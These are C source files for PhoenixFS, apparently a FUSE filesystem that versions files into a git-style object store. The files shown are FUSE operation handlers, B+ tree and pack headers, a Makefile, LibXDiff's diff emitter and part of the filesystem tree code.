static int phoenixfs_write(const char *path, const char *buf, size_t size,
off_t offset, struct fuse_file_info *fi)
{
ssize_t written_bytes;
PHOENIXFS_DBG("write:: %s", path);
pthread_mutex_lock(&phoenixfs_mutexlock);
if ((written_bytes = pwrite(fi->fh, buf, size, offset)) < 0) {
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
pthread_mutex_unlock(&phoenixfs_mutexlock);
return written_bytes;
}
static int phoenixfs_statfs(const char *path, struct statvfs *statv)
{
PHOENIXFS_DBG("statfs:: %s", path);
build_xpath(xpath, path, 0);
if (statvfs(xpath, statv) < 0)
return -errno;
return 0;
}
static int phoenixfs_release(const char *path, struct fuse_file_info *fi)
{
struct file_record *fr;
FILE *infile, *outfile;
struct stat st;
unsigned char sha1[20];
char sha1_digest[40];
char outfilename[40];
char inpath[PATH_MAX];
char outpath[PATH_MAX];
int rev, ret;
pthread_mutex_lock(&phoenixfs_mutexlock);
/* Don't recursively backup history */
if ((rev = parse_pathspec(xpath, path))) {
PHOENIXFS_DBG("release:: history: %s", path);
/* Inflate the original version back onto the filesystem */
if (!(fr = find_fr(xpath, 0))) {
PHOENIXFS_DBG("release:: Can't find revision 0!");
pthread_mutex_unlock(&phoenixfs_mutexlock);
return 0;
}
print_sha1(sha1_digest, fr->sha1);
sprintf(inpath, "%s/.git/loose/%s", ROOTENV->fsback, sha1_digest);
build_xpath(outpath, xpath, 0);
if (!(infile = fopen(inpath, "rb")) ||
!(outfile = fopen(outpath, "wb+"))) {
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
PHOENIXFS_DBG("release:: history: zinflate %s onto %s",
sha1_digest, outpath);
rewind(infile);
rewind(outfile);
if (zinflate(infile, outfile) != Z_OK)
PHOENIXFS_DBG("release:: zinflate issue");
fflush(outfile);
fclose(infile);
fclose(outfile);
if (close(fi->fh) < 0) {
PHOENIXFS_DBG("release:: can't really close");
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
pthread_mutex_unlock(&phoenixfs_mutexlock);
return 0;
}
/* Attempt to create a backup */
build_xpath(xpath, path, 0);
if (!(infile = fopen(xpath, "rb")) ||
(lstat(xpath, &st) < 0)) {
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
if ((ret = sha1_file(infile, st.st_size, sha1)) < 0) {
fclose(infile);
pthread_mutex_unlock(&phoenixfs_mutexlock);
return ret;
}
print_sha1(outfilename, sha1);
sprintf(outpath, "%s/.git/loose/%s", ROOTENV->fsback, outfilename);
if (!access(outpath, F_OK)) {
/* SHA1 match; don't overwrite file as an optimization */
PHOENIXFS_DBG("release:: not overwriting: %s", outpath);
goto END;
}
if (!(outfile = fopen(outpath, "wb"))) {
fclose(infile);
pthread_mutex_unlock(&phoenixfs_mutexlock);
return -errno;
}
/* Rewind and seek back */
rewind(infile);
PHOENIXFS_DBG("release:: zdeflate %s onto %s", xpath, outfilename);
if (zdeflate(infile, outfile, -1) != Z_OK)
PHOENIXFS_DBG("release:: zdeflate issue");
mark_for_packing(sha1, st.st_size);
fclose(outfile);
END:
fclose(infile);
if (close(fi->fh) < 0) {
PHOENIXFS_DBG("release:: can't really close");
return -errno;
}
/* Update the fstree */
fstree_insert_update_file(path, NULL);
pthread_mutex_unlock(&phoenixfs_mutexlock);
return 0;
}
static int phoenixfs_fsync(const char *path,
int datasync, struct fuse_file_info *fi)
{
PHOENIXFS_DBG("fsync:: %s", path);
if (datasync) {
if (fdatasync(fi->fh) < 0)
return -errno;
} else
if (fsync(fi->fh) < 0)
return -errno;
return 0;
}
static int phoenixfs_ftruncate(const char *path,
off_t offset, struct fuse_file_info *fi)
{
PHOENIXFS_DBG("ftruncate:: %s", path);
build_xpath(xpath, path, 0);
if (ftruncate(fi->fh, offset) < 0)
return -errno;
return 0;
}
static int phoenixfs_readlink(const char *path, char *link, size_t size)
{
ssize_t len;
/* Always pass through to underlying filesystem */
PHOENIXFS_DBG("readlink:: %s", path);
build_xpath(xpath, path, 0);
/* readlink(2) does not NUL-terminate the buffer */
if ((len = readlink(xpath, link, size - 1)) < 0)
return -errno;
link[len] = '\0';
return 0;
}
static int phoenixfs_mkdir(const char *path, mode_t mode)
{
PHOENIXFS_DBG("mkdir:: %s", path);
build_xpath(xpath, path, 0);
if (mkdir(xpath, mode) < 0)
return -errno;
return 0;
}
static int phoenixfs_unlink(const char *path)
{
/* Always pass through to underlying filesystem */
PHOENIXFS_DBG("unlink:: %s", path);
fstree_remove_file(path);
build_xpath(xpath, path, 0);
if (unlink(xpath) < 0)
return -errno;
return 0;
}
static int phoenixfs_rmdir(const char *path)
{
/* Always pass through to underlying filesystem */
PHOENIXFS_DBG("rmdir:: %s", path);
build_xpath(xpath, path, 0);
if (rmdir(xpath) < 0)
return -errno;
return 0;
}
static void phoenixfs_destroy(void *userdata)
{
FILE *outfile;
/* Persist the fstree */
sprintf(xpath, "%s/.git/fstree", ROOTENV->fsback);
if (!(outfile = fopen(xpath, "wb"))) {
PHOENIXFS_DBG("destroy:: Can't open .git/fstree to persist");
return;
}
PHOENIXFS_DBG("destroy:: dumping fstree");
fstree_dump_tree(outfile);
fclose(outfile);
PHOENIXFS_DBG("destroy:: packing loose objects");
sprintf(xpath, "%s/.git/loose", ROOTENV->fsback);
dump_packing_info(xpath);
}
static struct fuse_operations phoenixfs_oper = {
.init = phoenixfs_init,
.getattr = phoenixfs_getattr,
.fgetattr = phoenixfs_fgetattr,
.open = phoenixfs_open,
.mknod = phoenixfs_mknod,
.releasedir = phoenixfs_releasedir,
.create = phoenixfs_create,
.read = phoenixfs_read,
.write = phoenixfs_write,
.statfs = phoenixfs_statfs,
.access = phoenixfs_access,
.getdir = NULL,
.readdir = phoenixfs_readdir,
.opendir = phoenixfs_opendir,
.readlink = phoenixfs_readlink,
.mkdir = phoenixfs_mkdir,
.rmdir = phoenixfs_rmdir,
.unlink = phoenixfs_unlink,
.fsync = phoenixfs_fsync,
.release = phoenixfs_release,
.ftruncate = phoenixfs_ftruncate,
.symlink = phoenixfs_symlink,
.link = phoenixfs_link,
.chown = phoenixfs_chown,
.chmod = phoenixfs_chmod,
.rename = phoenixfs_rename,
.truncate = phoenixfs_truncate,
.utime = phoenixfs_utime,
#if 0
.setxattr = phoenixfs_setxattr;
.getxattr = phoenixfs_getxattr;
.listxattr = phoenixfs_listxattr;
.removexattr = phoenixfs_removexattr;
.fsyncdir = phoenixfs_fsyncdir,
.lock = phoenixfs_lock,
.flush = phoenixfs_flush,
.utimens = phoenixfs_utimens,
.bmap = phoenixfs_bmap,
.poll = phoenixfs_poll,
.ioctl = phoenixfs_ioctl,
#endif
.destroy = phoenixfs_destroy,
};
/* phoenixfs mount <gitdir> <mountpoint> */
/* argv[2] is fsback and argv[3] is the mountpoint */
int phoenixfs_fuse(int argc, char *argv[])
{
char *nargv[4];
FILE *infile;
void *record;
struct stat st;
register int i;
struct dir_record *dr;
struct node *iter, *iter_root;
struct env_t rootenv;
/* Sanitize fsback */
if (!realpath(argv[2], rootenv.fsback))
die("Invalid fsback: %s", argv[2]);
if ((lstat(rootenv.fsback, &st) < 0) ||
(access(rootenv.fsback, R_OK | W_OK | X_OK) < 0))
die("fsback doesn't have rwx permissions: %s",
rootenv.fsback);
if (!S_ISDIR(st.st_mode))
die("fsback not a directory: %s", rootenv.fsback);
/* Sanitize mountpoint */
if (!realpath(argv[3], rootenv.mountpoint))
die("Invalid mountpoint: %s", argv[3]);
if ((lstat(rootenv.mountpoint, &st) < 0) ||
(access(rootenv.mountpoint, R_OK | W_OK | X_OK) < 0))
die("mountpoint doesn't have rwx permissions: %s",
rootenv.mountpoint);
if (!S_ISDIR(st.st_mode))
die("mountpoint not a directory: %s", rootenv.mountpoint);
/* Check for .git directory */
sprintf(xpath, "%s/.git", rootenv.fsback);
mkdir(xpath, S_IRUSR | S_IWUSR | S_IXUSR);
if ((lstat(xpath, &st) < 0) ||
(access(xpath, R_OK | W_OK | X_OK) < 0))
die(".git doesn't have rwx permissions: %s", xpath);
if (!S_ISDIR(st.st_mode))
die(".git not a directory: %s", xpath);
/* Check for .git/loose directory */
sprintf(xpath, "%s/.git/loose", rootenv.fsback);
mkdir(xpath, S_IRUSR | S_IWUSR | S_IXUSR);
if ((lstat(xpath, &st) < 0) ||
(access(xpath, R_OK | W_OK | X_OK) < 0))
die(".git/loose doesn't have rwx permissions: %s", xpath);
if (!S_ISDIR(st.st_mode))
die(".git/loose not a directory: %s", xpath);
PHOENIXFS_DBG("phoenixfs_fuse:: fsback: %s, mountpoint: %s",
rootenv.fsback, rootenv.mountpoint);
/* Check for .git/fstree to load tree */
sprintf(xpath, "%s/.git/fstree", rootenv.fsback);
if (!access(xpath, F_OK) &&
(infile = fopen(xpath, "rb"))) {
PHOENIXFS_DBG("phoenixfs_fuse:: loading fstree");
fstree_load_tree(infile);
fclose(infile);
}
/* Re-create dr tree */
iter_root = get_fsroot();
iter = get_fsroot();
if (!iter)
goto END;
while (!iter->is_leaf)
iter = iter->pointers[0];
while (1) {
for (i = 0; i < iter->num_keys; i++) {
if (!(record = find(iter_root, iter->keys[i], 0))) {
PHOENIXFS_DBG("phoenixfs_fuse:: key listing issue");
continue;
}
dr = (struct dir_record *) record;
PHOENIXFS_DBG("phoenixfs_fuse:: mkdir: %s",
(const char *) dr->name);
sprintf(xpath, "%s%s", rootenv.fsback,
(const char *) dr->name);
mkdir(xpath, S_IRUSR | S_IWUSR | S_IXUSR);
}
if (iter->pointers && iter->pointers[BTREE_ORDER - 1] != NULL)
iter = iter->pointers[BTREE_ORDER - 1];
else
break;
}
END:
/* Check for .git/master.pack and .git/master.idx */
sprintf(xpath, "%s/.git/master.pack", rootenv.fsback);
sprintf(openpath, "%s/.git/master.idx", rootenv.fsback);
if ((access(xpath, F_OK) < 0) ||
(access(openpath, F_OK) < 0)) {
PHOENIXFS_DBG("phoenixfs_fuse:: not loading packing info");
load_packing_info(xpath, openpath, false);
}
else {
PHOENIXFS_DBG("phoenixfs_fuse:: loading packing info");
load_packing_info(xpath, openpath, true);
}
nargv[0] = argv[0];
nargv[1] = "-d";
nargv[2] = "-odefault_permissions";
nargv[3] = argv[3];
return fuse_main(4, nargv, &phoenixfs_oper, &rootenv);
}
<|start_filename|>btree.h<|end_filename|>
#ifndef BTREE_H_
#define BTREE_H_
#include <stdbool.h>
#include <stdlib.h>
#include <stdint.h>
#include <limits.h>
#define BTREE_ORDER 3
/* How many revisions of each file to store */
#define REV_TRUNCATE 20
enum mode_t {
NODE_REGULAR,
NODE_SYMLINK,
NODE_EXECUTABLE,
};
/*Type representing a node in the B+ tree.
*This type is general enough to serve for both
*the leaf and the internal node.
*The heart of the node is the array
*of keys and the array of corresponding
*pointers. The relation between keys
*and pointers differs between leaves and
*internal nodes. In a leaf, the index
*of each key equals the index of its corresponding
*pointer, with a maximum of order - 1 key-pointer
*pairs. The last pointer points to the
*leaf to the right (or NULL in the case
*of the rightmost leaf).
*In an internal node, the first pointer
*refers to lower nodes with keys less than
*the smallest key in the keys array. Then,
*with indices i starting at 0, the pointer
*at i + 1 points to the subtree with keys
*greater than or equal to the key in this
*node at index i.
*The num_keys field is used to keep
*track of the number of valid keys.
*In an internal node, the number of valid
*pointers is always num_keys + 1.
*In a leaf, the number of valid pointers
*to data is always num_keys. The
*last leaf pointer points to the next leaf.
*/
typedef struct node {
void **pointers;
uint16_t *keys;
struct node *parent;
bool is_leaf;
uint16_t num_keys;
struct node *next; // Used for queue.
} node;
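/*Example with BTREE_ORDER 3: an internal root holding the single key 13
*has pointers[0] -> leaf {7, 11} and pointers[1] -> leaf {13, 42}; in a
*leaf, pointers[i] is the record stored under keys[i], and
*pointers[order - 1] links to the next leaf (NULL for the rightmost).
*/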
struct file_record {
unsigned char sha1[20];
unsigned char follow[PATH_MAX];
enum mode_t mode;
size_t size;
time_t mtime;
};
struct vfile_record {
unsigned char name[PATH_MAX];
struct file_record *history[REV_TRUNCATE];
int8_t HEAD;
};
struct dir_record {
unsigned char name[PATH_MAX];
struct node *vroot;
};
// FUNCTION PROTOTYPES.
// Output and utility.
void usage_1(void);
void usage_2(void);
void enqueue(node *new_node);
node *dequeue(void);
int height(node *root);
int path_to_root(node *root, node *child);
void print_leaves(node *root);
void print_tree(node *root);
node *find_leaf(node *root, uint16_t key, bool verbose);
void *find(node *root, uint16_t key, bool verbose);
int cut(int length);
// Insertion.
node *make_node(void);
node *make_leaf(void);
int get_left_index(node *parent, node *left);
node *insert_into_leaf(node *leaf, uint16_t key, struct dir_record *pointer);
node *insert_into_leaf_after_splitting(node *root, node *leaf, uint16_t key, struct dir_record *pointer);
node *insert_into_node(node *root, node *parent,
int left_index, uint16_t key, node *right);
node *insert_into_node_after_splitting(node *root, node *parent, int left_index,
uint16_t key, node *right);
node *insert_into_parent(node *root, node *left, uint16_t key, node *right);
node *insert_into_new_root(node *left, uint16_t key, node *right);
node *start_new_tree(uint16_t key, struct dir_record *pointer);
node *insert(node *root, uint16_t key, void *value);
// Deletion.
int get_neighbor_index(node *n);
node *adjust_root(node *root);
node *coalesce_nodes(node *root, node *n, node *neighbor, int neighbor_index, int k_prime);
node *redistribute_nodes(node *root, node *n, node *neighbor, int neighbor_index,
int k_prime_index, int k_prime);
node *delete_entry(node *root, node *n, uint16_t key, void *pointer);
node *delete(node *root, uint16_t key);
void destroy_tree(node *root);
#endif
<|start_filename|>pack.h<|end_filename|>
#ifndef PACK_H_
#define PACK_H_
#define PACK_SIGNATURE 0x5041434b
#define PACK_IDX_SIGNATURE 0xff744f63
#define PACK_IDX_VERSION 2
#define PACK_VERSION 3
#define pack_idx_off32_limit 0x7fffffff
#include "common.h"
#include "buffer.h"
#include "sha1.h"
#include <stdbool.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <limits.h>
struct packed_git {
char pack_path[PATH_MAX];
char idx_path[PATH_MAX];
FILE *packfh;
const void *idx_data;
size_t pack_size;
size_t idx_size;
uint32_t nr;
};
/* Omit number of entries in pack */
struct pack_header {
uint32_t signature;
uint32_t version;
};
struct pack_idx_header {
uint32_t signature;
uint32_t version;
};
/* pack_idx_entry contains a trailing size field that's used only by
the loose module internally; we will strip it off before writing it
to the actual index */
struct pack_idx_entry {
unsigned char sha1[20];
off_t offset;
size_t size;
};
int initialize_pack_file(const char *pack_path, const char *idx_path);
int load_packing_info(const char *pack_path, const char *idx_path,
bool existing_pack);
void dump_packing_info(const char *loosedir);
int map_pack_idx(FILE *src);
void unmap_write_idx(struct pack_idx_entry *objects[], int nr_objects);
void packup_loose_objects(FILE *packfh, const void *idx_data,
uint32_t idx_nr, const char *loosedir);
void mark_for_packing(const unsigned char *sha1, size_t size);
void add_loose_entry(unsigned char *sha1, size_t size);
int unpack_entry(unsigned char *sha1, const char *loosedir);
#endif
<|start_filename|>Makefile<|end_filename|>
CC = gcc
RM = rm -f
MV = mv
XDIFF_LIB = xdiff/lib.a
SHA1_LIB = block-sha1/lib.a
BUILTIN_OBJS =
BUILTIN_OBJS += common.o
BUILTIN_OBJS += main.o
BUILTIN_OBJS += fuse.o
BUILTIN_OBJS += buffer.o
BUILTIN_OBJS += compress.o
BUILTIN_OBJS += pack.o
BUILTIN_OBJS += sha1.o
BUILTIN_OBJS += diff.o
BUILTIN_OBJS += btree.o
BUILTIN_OBJS += crc32.o
BUILTIN_OBJS += fstree.o
BUILTIN_OBJS += persist.o
BUILTIN_OBJS += delta.o
BUILTIN_OBJS += loose.o
ALL_TARGETS = phoenixfs
CFLAGS = -g -O0 -Wall -Werror $(shell pkg-config fuse --cflags) $(shell pkg-config zlib --cflags)
LDFLAGS = $(shell pkg-config fuse --libs) $(shell pkg-config zlib --libs)
ALL_CFLAGS = $(CFLAGS)
ALL_LDFLAGS = $(LDFLAGS)
ALL_LIBS = $(XDIFF_LIB) $(SHA1_LIB)
QUIET_SUBDIR0 = +$(MAKE) -C # space to separate -C and subdir
QUIET_SUBDIR1 =
ifneq ($(findstring $(MAKEFLAGS),w),w)
PRINT_DIR = --no-print-directory
else # "make -w"
NO_SUBDIR = :
endif
ifneq ($(findstring $(MAKEFLAGS),s),s)
ifndef V
QUIET_CC = @echo ' ' CC $@;
QUIET_AR = @echo ' ' AR $@;
QUIET_LINK = @echo ' ' LINK $@;
QUIET_SUBDIR0 = +@subdir=
QUIET_SUBDIR1 = ;$(NO_SUBDIR) echo ' ' SUBDIR $$subdir; \
$(MAKE) $(PRINT_DIR) -C $$subdir
endif
endif
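# Illustrative note (not part of the original Makefile): when V is unset and
# make is not run silently, the QUIET_* helpers above replace full command
# lines with terse "CC"/"AR"/"LINK" summaries; invoking "make V=1" leaves the
# helpers empty so the raw commands are echoed again.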
XDIFF_OBJS = xdiff/xdiffi.o xdiff/xprepare.o xdiff/xutils.o xdiff/xemit.o \
xdiff/xmerge.o xdiff/xpatience.o
SHA1_OBJS = block-sha1/sha1.o
all:: $(ALL_TARGETS)
phoenixfs$X: $(BUILTIN_OBJS) $(ALL_LIBS)
$(QUIET_LINK)$(CC) $(ALL_CFLAGS) -o $@ $(BUILTIN_OBJS) \
$(ALL_LDFLAGS) $(ALL_LIBS)
%.o: %.c %.h btree.h
$(QUIET_CC)$(CC) -o $*.o -c $(ALL_CFLAGS) $<
$(XDIFF_LIB): $(XDIFF_OBJS)
$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $^
$(SHA1_LIB): $(SHA1_OBJS)
$(QUIET_AR)$(RM) $@ && $(AR) rcs $@ $^
test:
$(MAKE) -C t
clean:
$(RM) $(ALL_TARGETS) $(BUILTIN_OBJS) $(XDIFF_OBJS) \
$(SHA1_OBJS) $(ALL_LIBS)
.PHONY: all clean FORCE
<|start_filename|>xdiff/xemit.c<|end_filename|>
/*
* LibXDiff by <NAME> ( File Differential Library )
* Copyright (C) 2003 <NAME>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*
* <NAME> <<EMAIL>>
*
*/
#include "xinclude.h"
static long xdl_get_rec(xdfile_t *xdf, long ri, char const **rec);
static int xdl_emit_record(xdfile_t *xdf, long ri, char const *pre, xdemitcb_t *ecb);
static long xdl_get_rec(xdfile_t *xdf, long ri, char const **rec) {
*rec = xdf->recs[ri]->ptr;
return xdf->recs[ri]->size;
}
static int xdl_emit_record(xdfile_t *xdf, long ri, char const *pre, xdemitcb_t *ecb) {
long size, psize = strlen(pre);
char const *rec;
size = xdl_get_rec(xdf, ri, &rec);
if (xdl_emit_diffrec(rec, size, pre, psize, ecb) < 0) {
return -1;
}
return 0;
}
/*
* Starting at the passed change atom, find the latest change atom to be included
* inside the differential hunk according to the specified configuration.
*/
xdchange_t *xdl_get_hunk(xdchange_t *xscr, xdemitconf_t const *xecfg) {
xdchange_t *xch, *xchp;
long max_common = 2 * xecfg->ctxlen + xecfg->interhunkctxlen;
for (xchp = xscr, xch = xscr->next; xch; xchp = xch, xch = xch->next)
if (xch->i1 - (xchp->i1 + xchp->chg1) > max_common)
break;
return xchp;
}
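/*
 * Illustrative example (not in the original source): with ctxlen = 3 and
 * interhunkctxlen = 0, max_common is 6, so two changes separated by at most
 * six unchanged lines are folded into a single hunk by the loop above.
 */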
static long def_ff(const char *rec, long len, char *buf, long sz, void *priv)
{
if (len > 0 &&
(isalpha((unsigned char)*rec) || /* identifier? */
*rec == '_' || /* also identifier? */
*rec == '$')) { /* identifiers from VMS and other esoterico */
if (len > sz)
len = sz;
while (0 < len && isspace((unsigned char)rec[len - 1]))
len--;
memcpy(buf, rec, len);
return len;
}
return -1;
}
static int xdl_emit_common(xdfenv_t *xe, xdchange_t *xscr, xdemitcb_t *ecb,
xdemitconf_t const *xecfg) {
xdfile_t *xdf = &xe->xdf1;
const char *rchg = xdf->rchg;
long ix;
for (ix = 0; ix < xdf->nrec; ix++) {
if (rchg[ix])
continue;
if (xdl_emit_record(xdf, ix, "", ecb))
return -1;
}
return 0;
}
int xdl_emit_diff(xdfenv_t *xe, xdchange_t *xscr, xdemitcb_t *ecb,
xdemitconf_t const *xecfg) {
long s1, s2, e1, e2, lctx;
xdchange_t *xch, *xche;
char funcbuf[80];
long funclen = 0;
long funclineprev = -1;
find_func_t ff = xecfg->find_func ? xecfg->find_func : def_ff;
if (xecfg->flags & XDL_EMIT_COMMON)
return xdl_emit_common(xe, xscr, ecb, xecfg);
for (xch = xscr; xch; xch = xche->next) {
xche = xdl_get_hunk(xch, xecfg);
s1 = XDL_MAX(xch->i1 - xecfg->ctxlen, 0);
s2 = XDL_MAX(xch->i2 - xecfg->ctxlen, 0);
lctx = xecfg->ctxlen;
lctx = XDL_MIN(lctx, xe->xdf1.nrec - (xche->i1 + xche->chg1));
lctx = XDL_MIN(lctx, xe->xdf2.nrec - (xche->i2 + xche->chg2));
e1 = xche->i1 + xche->chg1 + lctx;
e2 = xche->i2 + xche->chg2 + lctx;
/*
* Emit current hunk header.
*/
if (xecfg->flags & XDL_EMIT_FUNCNAMES) {
long l;
for (l = s1 - 1; l >= 0 && l > funclineprev; l--) {
const char *rec;
long reclen = xdl_get_rec(&xe->xdf1, l, &rec);
long newfunclen = ff(rec, reclen, funcbuf,
sizeof(funcbuf),
xecfg->find_func_priv);
if (newfunclen >= 0) {
funclen = newfunclen;
break;
}
}
funclineprev = s1 - 1;
}
if (xdl_emit_hunk_hdr(s1 + 1, e1 - s1, s2 + 1, e2 - s2,
funcbuf, funclen, ecb) < 0)
return -1;
/*
* Emit pre-context.
*/
for (; s1 < xch->i1; s1++)
if (xdl_emit_record(&xe->xdf1, s1, " ", ecb) < 0)
return -1;
for (s1 = xch->i1, s2 = xch->i2;; xch = xch->next) {
/*
* Merge previous with current change atom.
*/
for (; s1 < xch->i1 && s2 < xch->i2; s1++, s2++)
if (xdl_emit_record(&xe->xdf1, s1, " ", ecb) < 0)
return -1;
/*
* Removes lines from the first file.
*/
for (s1 = xch->i1; s1 < xch->i1 + xch->chg1; s1++)
if (xdl_emit_record(&xe->xdf1, s1, "-", ecb) < 0)
return -1;
/*
* Adds lines from the second file.
*/
for (s2 = xch->i2; s2 < xch->i2 + xch->chg2; s2++)
if (xdl_emit_record(&xe->xdf2, s2, "+", ecb) < 0)
return -1;
if (xch == xche)
break;
s1 = xch->i1 + xch->chg1;
s2 = xch->i2 + xch->chg2;
}
/*
* Emit post-context.
*/
for (s1 = xche->i1 + xche->chg1; s1 < e1; s1++)
if (xdl_emit_record(&xe->xdf1, s1, " ", ecb) < 0)
return -1;
}
return 0;
}
<|start_filename|>fstree.c<|end_filename|>
#include "fstree.h"
#include <fuse.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
static struct node *fsroot = NULL;
static char dirname[PATH_MAX] = "\0";
/* Pathspec: <path>[@<rev>] */
int parse_pathspec(char *xpath, const char *path)
{
int revision;
char *split;
if (!(split = strrchr(path, '@')))
goto END;
revision = atoi(split + 1);
if (revision < 0 || revision > 20)
goto END;
memcpy(xpath, path, split - path);
xpath[split - path] = '\0';
return revision;
END:
strcpy(xpath, path);
return 0;
}
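/*
 * Illustrative example (not in the original source): parse_pathspec(xpath,
 * "/docs/readme@4") copies "/docs/readme" into xpath and returns revision 4;
 * a plain "/docs/readme" (or a path with an out-of-range revision) is copied
 * verbatim and 0 is returned.
 */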
int build_xpath(char *xpath, const char *path, int rev)
{
struct file_record *fr;
char sha1_digest[40];
if (!rev) {
/* Search on FS */
strcpy(xpath, ROOTENV->fsback);
strcat(xpath, path);
return 0;
}
if (!(fr = find_fr(path, rev))) {
PHOENIXFS_DBG("build_xpath:: missing: %s@%d", path, rev);
/* Might be a directory; copy and give to caller */
strcpy(xpath, path);
return -1;
}
print_sha1(sha1_digest, fr->sha1);
sprintf(xpath, "%s/.git/loose/%s", ROOTENV->fsback, sha1_digest);
if (access(xpath, F_OK) < 0) {
/* Try extracting from packfile */
sprintf(xpath, "%s/.git/loose", ROOTENV->fsback);
if (unpack_entry(fr->sha1, xpath) < 0)
return -1;
else
PHOENIXFS_DBG("open:: pack %s", sha1_digest);
}
else
PHOENIXFS_DBG("open:: loose %s", sha1_digest);
return 0;
}
/* filename is simply a pointer; dirname must have alloc'ed memory */
char *split_basename(const char *path, char *dirname)
{
int length;
char *filename;
/* Paths always contain a '/'; in the worst case strrchr finds the leading one */
filename = strrchr(path, '/') + 1;
/* Strip trailing '/' from all directories except '/' itself */
/* +1 to accommodate the null terminator */
length = strlen(path) - strlen(filename);
length = (length == 1 ? 2 : length);
if (!dirname) {
PHOENIXFS_DBG("split_basename:: path: %s, filename: %s",
path, filename);
return filename;
}
memcpy(dirname, path, length - 1);
dirname[length - 1] = '\0';
PHOENIXFS_DBG("split_basename:: path: %s, dirname: %s, filename: %s",
path, dirname, filename);
return filename;
}
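/*
 * Illustrative example (not in the original source): split_basename("/a/b/c.txt",
 * dir) fills dir with "/a/b" and returns a pointer to "c.txt"; for "/c.txt"
 * the directory collapses to "/" via the length adjustment above.
 */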
void fill_stat(struct stat *st, struct file_record *fr)
{
if (!fr || !st) {
st = NULL;
return;
}
memset(st, 0, sizeof(struct stat));
switch (fr->mode) {
case NODE_EXECUTABLE:
st->st_mode = S_IFREG | 0755;
break;
case NODE_SYMLINK:
st->st_mode = S_IFLNK | 0644;
break;
default:
st->st_mode = S_IFREG | 0644;
}
st->st_nlink = 1;
st->st_mtime = fr->mtime;
st->st_size = fr->size;
}
void fill_fr(struct file_record *fr, struct stat *st)
{
switch(st->st_mode) {
case S_IFREG | 0755:
fr->mode = NODE_EXECUTABLE;
break;
case S_IFLNK | 0644:
fr->mode = NODE_SYMLINK;
break;
default:
fr->mode = NODE_REGULAR;
break;
}
fr->size = st->st_size;
fr->mtime = st->st_mtime;
}
struct node *get_fsroot(void)
{
return fsroot;
}
struct dir_record *find_dr(const char *path)
{
struct dir_record *dr;
uint16_t key = ~0;
size_t length;
length = (size_t) strlen((char *) path);
key = compute_crc32(key, (const unsigned char *) path, length);
if (!(dr = find(fsroot, key, 0))) {
PHOENIXFS_DBG("find_dr:: missing %s", path);
return NULL;
}
PHOENIXFS_DBG("find_dr:: found %s", path);
return dr;
}
struct vfile_record *find_vfr(const char *path)
{
uint16_t key = ~0;
struct dir_record *dr;
struct vfile_record *vfr;
char *filename;
size_t length;
filename = split_basename(path, dirname);
if (!(dr = find_dr(dirname)) || !dr->vroot) {
PHOENIXFS_DBG("find_vfr:: not found %s", path);
return NULL;
}
length = (size_t) strlen((char *) filename);
key = compute_crc32(key, (const unsigned char *) filename, length);
if (!(vfr = find(dr->vroot, key, 0))) {
PHOENIXFS_DBG("find_vfr:: not found %s", path);
return NULL;
}
PHOENIXFS_DBG("find_vfr:: found %s", path);
return vfr;
}
struct file_record *find_fr(const char *path, int rev)
{
struct vfile_record *vfr;
struct file_record *fr;
if (!(vfr = find_vfr(path))) {
PHOENIXFS_DBG("find_fr:: not found %s", path);
return NULL;
}
/* Translate rev to mean "number of revs before HEAD" */
rev = (vfr->HEAD - rev) % REV_TRUNCATE;
if (!(fr = vfr->history[rev])) {
PHOENIXFS_DBG("find_fr:: not found %s", path);
return NULL;
}
PHOENIXFS_DBG("find_fr:: found %s", path);
return fr;
}
void insert_dr(struct dir_record *dr)
{
uint16_t key = ~0;
size_t length;
length = (size_t) strlen((char *) dr->name);
key = compute_crc32(key, (const unsigned char *) dr->name, length);
PHOENIXFS_DBG("insert_dr:: %08X", key);
fsroot = insert(fsroot, key, dr);
}
void insert_vfr(struct dir_record *dr, struct vfile_record *vfr)
{
uint16_t key = ~0;
size_t length;
length = (size_t) strlen((char *) vfr->name);
key = compute_crc32(key, (const unsigned char *) vfr->name, length);
PHOENIXFS_DBG("insert_vfr:: %08X", key);
dr->vroot = insert(dr->vroot, key, vfr);
}
void insert_fr(struct vfile_record *vfr, struct file_record *fr)
{
int newHEAD;
newHEAD = (vfr->HEAD + 1) % REV_TRUNCATE;
vfr->history[newHEAD] = fr;
vfr->HEAD = newHEAD;
PHOENIXFS_DBG("insert_fr:: %s [%d]", vfr->name, vfr->HEAD);
}
struct node *remove_entry(struct node *root, uint16_t key)
{
return delete(root, key);
}
struct dir_record *make_dr(const char *path)
{
struct dir_record *dr;
PHOENIXFS_DBG("make_dr:: %s", path);
if (!(dr = malloc(sizeof(struct dir_record))))
return NULL;
memset(dr, 0, sizeof(struct dir_record));
memcpy(dr->name, path, strlen(path) + 1);
dr->vroot = NULL;
return dr;
}
struct vfile_record *make_vfr(const char *name)
{
struct vfile_record *vfr;
PHOENIXFS_DBG("make_vfr:: %s", name);
if (!(vfr = malloc(sizeof(struct vfile_record))))
return NULL;
memset(vfr, 0, sizeof(struct vfile_record));
memcpy(vfr->name, name, strlen(name) + 1);
memset(vfr->history, 0,
REV_TRUNCATE * sizeof(struct file_record *));
vfr->HEAD = -1;
return vfr;
}
struct file_record *make_fr(const char *path, const char *follow)
{
struct file_record *fr;
unsigned char sha1[20];
char xpath[PATH_MAX];
struct stat st;
FILE *infile;
PHOENIXFS_DBG("make_fr:: %s", path);
if (!(fr = malloc(sizeof(struct file_record))))
return NULL;
memset(fr, 0, sizeof(struct file_record));
build_xpath(xpath, path, 0);
if (lstat(xpath, &st) < 0) {
PHOENIXFS_DBG("make_fr:: can't stat %s", xpath);
free(fr);
return NULL;
}
/* No point computing SHA1 of symlinks */
